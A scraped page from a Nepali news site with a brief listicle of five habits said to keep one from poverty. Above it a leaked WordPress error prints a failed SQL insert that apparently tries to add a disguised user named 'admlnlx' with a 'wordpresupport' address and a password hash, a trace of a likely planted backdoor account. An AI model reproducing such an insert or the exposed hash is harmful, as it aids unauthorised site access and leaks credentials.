WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrReiiS8FSYnBb7sSCB.eYjIexyIfQ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-18 21:47:25', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
गरिव हुन नदिने ५ कुरा – Gaule Khabar

गरिव हुन नदिने ५ कुरा

गरिव हुन नदिने ५ कुरा

पुस ११ –

१. वर्तमान समय कस्तो छ, समझदार व्यक्ति यस विषयमा सधै जानकार रहन्छन् । सुखको दिन हो या दुखको रु यसको आधारमा आफ्नो कार्य योजना तय गर्नुपर्छ ।
२. आफ्नो साथी को र सत्रु को हो रु यसवारे पनि जानकारी हुनुपर्छ । आफ्नो सच्चा मित्र को हो चिन्नुपर्छ । किनकी मित्रको भेषमा कतिपय सत्रुपनि हामीसामू आइरहेको हुनसक्छ ।

३. हामी कस्तो स्थानमा वसिरहेका छौ रु त्यहाको वातावरण कस्तो छ, माहौल कस्तो छ रु वुझ्नुपर्छ
४. आफ्नो आय÷व्यायवारे सधै अपडेट रहनुपर्छ । आम्दानी अनुसार खर्चको विवरण तयार गर्नुपर्छ ।
५. आफ्नो योग्यता एवं कुशलता के हो रु वुझ्नुपर्छ । अतः आफ्नो योग्यता अनुसारको काममा हात हाल्नुपर्छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका